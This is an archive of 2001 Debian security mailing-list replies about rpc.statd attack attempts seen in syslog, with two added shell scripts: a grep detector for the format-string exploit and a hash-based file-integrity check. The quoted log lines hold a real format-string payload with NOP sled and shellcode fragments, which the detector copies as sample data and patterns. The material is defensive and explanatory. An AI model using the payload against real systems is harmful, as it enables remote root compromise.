Re: A thought on Layne

2001-09-01 Thread Kath

 Damn, that would be funny.  Of course, he's using MS Outlook Express
 (judging from his headers) so it would probably have to be his ISP
 that got rooted.

Or his email is the one for his domain of the box that was r00ted.

- k


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]




Re: rpc.statd being attacked?

2001-08-21 Thread kath

I think this is an 800 year old Red Hat exploit, so probably no worries.

No need to worry, but any rpc services are lousy to have running anyway.

- k

- Original Message -
From: Daniel Schepler [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Tuesday, August 21, 2001 4:28 PM
Subject: rpc.statd being attacked?


 I've gotten logs several times that read something like

 Aug 20 19:20:24 adsl-63-193-247-253 rpc.statd[330]: gethostbyname error for ^XF7FFBF^XF7FFBF^YF7FFBF^YF7FFBF^ZF7FFBF^ZF7FFBF^[F7FFBF^[F7FFBF%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220

 (This is at least the way it reads in less.)  For now I've just shut
 down the rpc.statd daemon, but I was wondering if this is a known
 attack.
 --
 Daniel Schepler [EMAIL PROTECTED]
   Please don't disillusion me.  I haven't had breakfast yet.
   -- Orson Scott Card





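The entry Daniel quotes has the shape of the rpc.statd format-string attack: the caller-supplied string reaches a logging call as the format, the run of %8x conversions walks up the stack, the %n conversions write to the addresses planted at the front (read little-endian, the bytes ^X F7 FF BF are 0xbffff718, a typical Linux 2.x x86 stack address, and ^Y, ^Z, ^[ step it by one for the following writes), and the long run of \220 is syslog's octal escaping of a sled of 0x90 NOP bytes. A practitioner who has seen one such line wants to sweep the rest of the logs for the same shape. The script below is an added example, the editor's and not from the thread; it assumes a POSIX sh with grep, and its sample log lines are constructed (shortened from the kind of entry above), not taken from anyone's host.

```shell
#!/bin/sh
# Added example (editor's, not from the list posts): pick out rpc.statd
# entries that carry the markers of the format-string attack quoted above.
# The log excerpt is constructed for this demo; the exploit lines are
# shortened copies of the shape seen in the thread.

SAMPLE_LOG='Aug 20 19:20:24 adsl-63-193-247-253 rpc.statd[330]: gethostbyname error for ^XF7FFBF^XF7FFBF%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n\220\220\220\220\220\220\220\220
Aug 20 19:21:03 adsl-63-193-247-253 -- MARK --
Aug 20 19:25:11 adsl-63-193-247-253 rpc.statd[330]: gethostbyname error for client.example.net
Jul  9 01:21:11 blue /sbin/rpc.statd[166]: gethostbyname error for ^XF7FFBF%8x%8x%n\220\220\220\220'

# statd_fmtstr_hits: read syslog lines on stdin, print the rpc.statd
# "gethostbyname error for" lines whose hostname argument contains printf
# directives (%...x, %n) or a run of octal-escaped 0x90 NOP bytes (\220).
# A hostname that reached gethostbyname legitimately never contains '%',
# so a single '%n' is enough; '%n' is what turns a format bug into a write.
statd_fmtstr_hits() {
    grep -E 'rpc\.statd\[[0-9]+]: gethostbyname error for ' |
        grep -E '%[0-9]*[xn]|(\\220){4,}'
}

# count_sample_hits: number of flagged lines in the constructed excerpt.
count_sample_hits() {
    printf '%s\n' "$SAMPLE_LOG" | statd_fmtstr_hits | wc -l | tr -d ' '
}

# Stand-alone run: print the flagged lines, then the count (2 for the sample).
printf '%s\n' "$SAMPLE_LOG" | statd_fmtstr_hits
count_sample_hits
```

Run it over the real file with `statd_fmtstr_hits < /var/log/messages`. A hit records an attempt, not a success: whether the %n writes landed depends on whether the statd binary that logged the line still had the bug. On the live host, `rpcinfo -p` listing a `status` program means rpc.statd is still registered with the portmapper and reachable.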




Re: Unidentified subject!

2001-07-25 Thread kath

I think you mean 2.4.2 not 2.2.4 =)

- k

On Wednesday 25 July 2001 07:59 am, John DOE wrote:
 hi, I got a similar problem on a machine running IPCHAINS. After an
 unpredictable time period the machine suddenly forgets the ethernet card and
 results in 100% packet loss even though ifconfig shows the interface is there,
 and then crashes. I can see the card starts blinking and packets are coming but
 there is nothing in the log about that and the interface is there but it is
 not. I tried dist-upgrade (only the base system was installed on it and mc,
 nothing else) and it did not help. I have changed the ethernet card and it
 did not help and as a result I changed the distribution to lame Redhat 6.2
 for trial and it works, no problem. After that my manager said "never touch
 a running system" so I could not switch back to debian. My kernel was
 2.2.19 pre 17 and nothing unstable. I believe the problem is with the
 2.2.19 kernel since the only difference between the base systems of redhat
 and debian 2.2r3 is 2.2.14 and 2.2.19, not much else. I recommend you
 upgrade your sys to 2.2.4 kernel.

 --- Nick Name [EMAIL PROTECTED]

  wrote:
  Hi all. I run a stable with some package from testing (XFree86 4.02 and
  konqueror).
  
  Some weeks ago in the morning I found my computer had been rebooted by
  night and found some zeroes in my syslog, just before the reboot.
  I first thought of a worm, the latest ramen variant (don't remember the
  name right now), but I didn't find any sign of it.
  
  I have changed my passwords, however I am using ipchains.
  
  Today my computer has frozen (!!!  It's a debian, it really shouldn't :)
  ) and I found those zeroes again after pressing that big red button.
  
  Does someone know something about all this? May this be a security
  problem?
  
  Thanks for your attention and sorry for my bad English
  
  Vincenzo Ciancia
 
 --
 Nick Name - [EMAIL PROTECTED] - UIN 94982698 - Vincenzo Ciancia -
 
 





Re: was I cracked? (rpc.statd, new version)

2001-07-11 Thread kath

You can check for modified binaries with tripwire.

If this was a decent hacker or even a script kiddie using a good tool, they
probably would have purged your logs of all evidence.

So either:

a) They are second rate
or
b) They didn't get in

- k

- Original Message -
From: Alvin Oga [EMAIL PROTECTED]
To: Lukas Eppler [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Sent: Wednesday, July 11, 2001 5:45 PM
Subject: Re: was I cracked? (rpc.statd, new version)



hi ya lukas

how did you check for modified binaries ???

if it's an up-to-date deb box... it's a failed attempt...
if it's a redhat box... time to go digging...

you have to check the filesize of the binaries... not just the date...
compared to one that you know is NOT compromised...
and if you're really paranoid... run some tests on it..


have fun
alvin
http://www.Linux-Sec.net -- turn it off stuff ..


On Wed, 11 Jul 2001, Lukas Eppler wrote:

 I have the following entries in /var/log/messages:

 Jul  9 01:21:03 blue -- MARK --
 Jul  9 01:21:11 blue
 Jul  9 01:21:11 blue /sbin/rpc.statd[166]: gethostbyname error for ^XF7FFBF^XF7FFBF^YF7FFBF^YF7FFBF^ZF7FFBF^ZF7FFBF^[F7FFBF^[F7FFBF%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
 Jul  9 01:21:11 blue C7^F/binC7F^D/shA0C0\210F^G\211v^L\215V^P\215N^L\211F3B0^KCD\200B0^ACD\200E8\177FF
 Jul  9 01:41:03 blue -- MARK --

 I run debian 2.2, nfs-common is Version: 1:0.1.9.1-1 which has the long known
 exploit fixed. I can't find modified binaries or any strange behaviour... was
 this a defeated attack? The second line says /bin/sh somewhere which makes me
 a bit concerned... Was I cracked?

 Lukas



 --
 Tempobrain AG - Dufourstrasse 179 - 8008 Zürich
 http://www.tempobrain.com | icq # 5856 2285
 +44 20 7233 6206 | +44 79 8037 7312
 +41  1 389 29 29 | +41 76 373 07 87


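Alvin's advice (compare sizes against a copy you know is clean, not dates) and kath's (tripwire) come down to the same mechanism: a manifest of the trusted tree taken in advance, and a later comparison against it. The /bin/sh in Lukas's second log line is the attacker's payload echoed back by the logging call; it shows what was sent, not whether it ran, and the state of the binaries is what settles that question. The script below is an added example, the editor's and not from the thread; it assumes POSIX sh with find, awk, diff and coreutils sha256sum, and it demonstrates on a throwaway directory it builds itself rather than on /bin.

```shell
#!/bin/sh
# Added example (editor's, not from the thread): a minimal tripwire-style
# baseline.  Records size and SHA-256 of every file under a directory, then
# compares a later manifest against it.  Needs POSIX sh, find, awk, diff
# and coreutils sha256sum.  The demo tree at the end is constructed.

# make_manifest DIR OUT: one line per regular file, "size sha256 path",
# sorted so two manifests of the same tree diff cleanly.  (Paths containing
# spaces or newlines are out of scope for this demo.)
make_manifest() {
    dir=$1; out=$2
    (
        cd "$dir" &&
        find . -type f | LC_ALL=C sort | while read -r f; do
            size=$(wc -c < "$f" | tr -d ' ')
            sum=$(sha256sum "$f" | cut -d' ' -f1)
            printf '%s %s %s\n' "$size" "$sum" "$f"
        done
    ) > "$out"
}

# check_manifest DIR BASELINE: print each path whose size or hash differs
# from the baseline, plus files added or removed since it was taken.
# mtime is deliberately not recorded: an intruder resets it with touch -r,
# which is why the thread says to compare sizes and content, not dates.
check_manifest() {
    dir=$1; base=$2
    cur=$(mktemp)
    make_manifest "$dir" "$cur"
    diff "$base" "$cur" | awk '/^[<>]/ { print $4 }' | sort -u
    rm -f "$cur"
}

# demo_changed_count: build a throwaway tree, take a baseline, then swap
# bin/ps for a same-size replacement and copy bin/ls's mtime onto it.
# Size and date both look untouched; the hash still gives it away.
# Prints the number of paths flagged (1 for this demo).
demo_changed_count() {
    root=$(mktemp -d)
    mkdir -p "$root/bin"
    printf 'ls v1\n' > "$root/bin/ls"
    printf 'ps v1\n' > "$root/bin/ps"
    make_manifest "$root" "$root.base"
    printf 'ps v2\n' > "$root/bin/ps"       # constructed "trojan": same size
    touch -r "$root/bin/ls" "$root/bin/ps"  # mtime made to match a clean file
    n=$(check_manifest "$root" "$root.base" | wc -l | tr -d ' ')
    rm -rf "$root" "$root.base"
    echo "$n"
}

demo_changed_count
```

On Debian the per-package md5sums under /var/lib/dpkg/info/ give a ready-made baseline and `debsums` compares the installed files against them, which is the quick first check. Those lists sit on the same disk as the binaries, though, so a root-level intruder can rewrite both together. Take the baseline while the box is known good, keep it off the host or on read-only media, and run the comparison from a clean boot medium rather than with the find and sha256sum of the suspect system, which are exactly the binaries a rootkit replaces.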



